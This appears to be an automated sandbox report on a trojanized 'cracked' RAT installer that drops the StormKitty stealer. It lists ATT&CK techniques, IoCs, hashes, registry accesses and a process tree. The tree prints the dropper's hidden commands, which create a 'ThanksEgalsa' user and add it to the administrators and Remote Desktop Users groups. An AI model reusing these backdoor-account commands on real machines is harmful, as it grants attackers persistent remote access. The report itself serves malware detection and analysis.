stormkitty | 37fae2ac78281be79821e625ba969bcd0c11336c56e68b71b5fbb284e9f8fd60

General

Target

Spyroid Rat v8.5 Original Cracked.exe
Size

55.7MB
MD5

f2a9d485cc841bbd44543973e3739c05
SHA1

53235a653bfc5822693e9adfdea01e1164909df9
SHA256

37fae2ac78281be79821e625ba969bcd0c11336c56e68b71b5fbb284e9f8fd60
SHA512

4de26d0f38868934182e0ef1fc3270990a66eba2c6af340490f55e4bf7f04696f91f93f62457191031d468e34c0ec5f0ba4995df63275dbf77254b1a7d2be56d
SSDEEP

786432:JrXC9Vqv1tRgvtgkG8iAl0dYyBGpjKElxsdo/AG9Lqxlwy+WpL15Q7HxJ1KP3u5C:JjC9VvtdG8iV6jKmqdo/ry+gXwIuqxZ

Score

10^/10

stormkitty collection discovery lateral_movement spyware stealer

Malware Config

Signatures

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023c9b-6.dat	family_stormkitty
behavioral1/memory/2572-27-0x0000000000190000-0x00000000001E6000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 1 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3760	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Spyroid Rat v8.5 Original Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	test rdp.exe

Executes dropped EXE 3 IoCs

pid	Process
2572	rl payload.exe
2584	test rdp.exe
4640	Spyroid Rat V8.5 Cracked.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rl payload.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rl payload.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rl payload.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\ProgramData\YQRLKYON\FileGrabber\Desktop\desktop.ini	rl payload.exe
File created	C:\ProgramData\YQRLKYON\FileGrabber\Documents\desktop.ini	rl payload.exe
File created	C:\ProgramData\YQRLKYON\FileGrabber\Downloads\desktop.ini	rl payload.exe
File created	C:\ProgramData\YQRLKYON\FileGrabber\Pictures\desktop.ini	rl payload.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	freegeoip.app
16	freegeoip.app

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rl payload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	test rdp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2184	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2572	rl payload.exe
2572	rl payload.exe
2572	rl payload.exe
1332	powershell.exe
1332	powershell.exe
2572	rl payload.exe
2572	rl payload.exe
2572	rl payload.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	rl payload.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 2572	1704	Spyroid Rat v8.5 Original Cracked.exe	83
PID 1704 wrote to memory of 2572	1704	Spyroid Rat v8.5 Original Cracked.exe	83
PID 1704 wrote to memory of 2572	1704	Spyroid Rat v8.5 Original Cracked.exe	83
PID 1704 wrote to memory of 2584	1704	Spyroid Rat v8.5 Original Cracked.exe	84
PID 1704 wrote to memory of 2584	1704	Spyroid Rat v8.5 Original Cracked.exe	84
PID 1704 wrote to memory of 2584	1704	Spyroid Rat v8.5 Original Cracked.exe	84
PID 2584 wrote to memory of 1332	2584	test rdp.exe	85
PID 2584 wrote to memory of 1332	2584	test rdp.exe	85
PID 2584 wrote to memory of 1332	2584	test rdp.exe	85
PID 1704 wrote to memory of 4640	1704	Spyroid Rat v8.5 Original Cracked.exe	87
PID 1704 wrote to memory of 4640	1704	Spyroid Rat v8.5 Original Cracked.exe	87
PID 1332 wrote to memory of 1220	1332	powershell.exe	89
PID 1332 wrote to memory of 1220	1332	powershell.exe	89
PID 1332 wrote to memory of 1220	1332	powershell.exe	89
PID 1220 wrote to memory of 624	1220	net.exe	90
PID 1220 wrote to memory of 624	1220	net.exe	90
PID 1220 wrote to memory of 624	1220	net.exe	90
PID 2584 wrote to memory of 2348	2584	test rdp.exe	91
PID 2584 wrote to memory of 2348	2584	test rdp.exe	91
PID 2584 wrote to memory of 2348	2584	test rdp.exe	91

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rl payload.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rl payload.exe

C:\Users\Admin\AppData\Local\Temp\Spyroid Rat v8.5 Original Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\Spyroid Rat v8.5 Original Cracked.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Users\Admin\AppData\Local\Temp\rl payload.exe
  "C:\Users\Admin\AppData\Local\Temp\rl payload.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Drops desktop.ini file(s)
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2572
- C:\Users\Admin\AppData\Local\Temp\test rdp.exe
  "C:\Users\Admin\AppData\Local\Temp\test rdp.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net user ThanksEgalsa ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" user ThanksEgalsa ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user ThanksEgalsa ThanksEgalsa /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup administrators ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" localgroup administrators ThanksEgalsa /add
      4⤵
      PID:4628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators ThanksEgalsa /add
        5⤵
        
        PID:636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup "Remote Desktop Users" ThanksEgalsa /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:3760
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" localgroup Remote Desktop Users ThanksEgalsa /add
      4⤵
      PID:4724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users ThanksEgalsa /add
        5⤵
        
        PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE30D.tmp.cmd""
    3⤵
    PID:3600
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 4
      4⤵
      Delays execution with timeout.exe
      PID:2184
- C:\Users\Admin\AppData\Local\Temp\Spyroid Rat V8.5 Cracked.exe
  "C:\Users\Admin\AppData\Local\Temp\Spyroid Rat V8.5 Cracked.exe"
  2⤵
  - Executes dropped EXE
  PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Privilege Escalation

Account Manipulation

1

T1098

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

2

T1552

Credentials In Files

2

T1552.001

Discovery

Browser Information Discovery

1

T1217

Permission Groups Discovery

1

T1069

Local Groups

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Remote Service Session Hijacking

1

T1563

RDP Hijacking

1

T1563.002

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\YQRLKYON\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
bd57923c9c103568b3a738b03cbd5081

SHA1
7d9378108c6c58055c5256437fe420cfb1d14e11

SHA256
001cf3ae7394e542620ca1b383a75bb6052c60f247417ff0f3b8ec784f6ba5a9

SHA512
181479d91b4c0d5df66047aae7d02db18e476928ea54a27ad79ab7445d58d6bf1ab6634929429c1f20d854ab5396981725c055c6b418cabdca205e3500aa3fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
6bb3001225c185923e5aefa34b99791e

SHA1
1f5a1fa59eb6a001424f0136ce42541e63ccbb99

SHA256
0b037c9312f466a51fe020ae247d663af6dc4f330ca524ba9bc9ff6e5f0a3740

SHA512
5976103c18fc49ea02a7372bb51cc263611aba90bb3a9784d8cef66541219f2824cc8cae545ad38bd153811f5dc43514932906f5efc4ac45d012e55842fccd25

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmlons42.af2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rl payload.exe

Filesize
320KB

MD5
dfa05cfd683034da7b16c32b76a6619c

SHA1
efe6fa32ba1c53155ed6acc32de614a3ca8cadff

SHA256
0c67544fc30499491749cc9cda184c4af9e61bf16dd697b402ad936df9e182f3

SHA512
cb966cf5dba9b32950b0f96e62dedcaeb1de22ee41a010f247f4e3ac2be602075bcd76d71a431164cee649ba4e91319a4dad41f553260ecffc7c02905d5889f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\test rdp.exe

Filesize
8KB

MD5
6019493627e029531ac13da62d870719

SHA1
46d7c20fd308c376e40060ee455743f7b913f7af

SHA256
0b85f47949effe436c598cddf1ddabf1b952eac63009d25fdee34f864bc10569

SHA512
a125613e5718dea3499e5a1b4b13dc48eef6b5bbc33462ae2a6cda2efd129992fec09ed799be738048c226e4f1743e4cc298236c2c9d2acf41c8301830a328da

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE30D.tmp.cmd

Filesize
154B

MD5
c59c10afb6bbb536cf3698667e29a6d9

SHA1
fa822ed7aaef38161ba6e4e266ffa2558136a945

SHA256
7d6b13a567eb7666bc20020c04411d7896d38a61b8fad85429acd2ccdfec0530

SHA512
e3750d024d2cf5b9295f716db833cb919eb413cef5da8d2ed645603550dde6bd672e5c5e23cea80d0057859ac6c084730ca4fcec5c85dc092861aada35c7ef17

Download Submit
memory/1332-62-0x00000000053D0000-0x00000000053F2000-memory.dmp

Filesize
136KB

Download
memory/1332-84-0x00000000063A0000-0x00000000063BE000-memory.dmp

Filesize
120KB

Download
memory/1332-60-0x0000000004E00000-0x0000000004E36000-memory.dmp

Filesize
216KB

Download
memory/1332-64-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/1332-63-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/1332-61-0x0000000005540000-0x0000000005B68000-memory.dmp

Filesize
6.2MB

Download
memory/1332-74-0x0000000005DC0000-0x0000000006114000-memory.dmp

Filesize
3.3MB

Download
memory/1332-91-0x0000000006700000-0x000000000674C000-memory.dmp

Filesize
304KB

Download
memory/1704-103-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

Filesize
10.8MB

Download
memory/1704-0-0x00007FFEAEFA3000-0x00007FFEAEFA5000-memory.dmp

Filesize
8KB

Download
memory/1704-10-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

Filesize
10.8MB

Download
memory/1704-1-0x0000000000550000-0x0000000003D12000-memory.dmp

Filesize
55.8MB

Download
memory/2348-145-0x0000000006F10000-0x0000000006F5C000-memory.dmp

Filesize
304KB

Download
memory/2572-90-0x00000000063C0000-0x0000000006964000-memory.dmp

Filesize
5.6MB

Download
memory/2572-81-0x0000000005D70000-0x0000000005E02000-memory.dmp

Filesize
584KB

Download
memory/2572-27-0x0000000000190000-0x00000000001E6000-memory.dmp

Filesize
344KB

Download
memory/2572-26-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download
memory/2572-198-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download
memory/2584-25-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

Filesize
4KB

Download
memory/2584-28-0x0000000000490000-0x0000000000498000-memory.dmp

Filesize
32KB

Download
memory/4640-118-0x000001E4962F0000-0x000001E49A500000-memory.dmp

Filesize
66.1MB

Download

Analysis

Sharing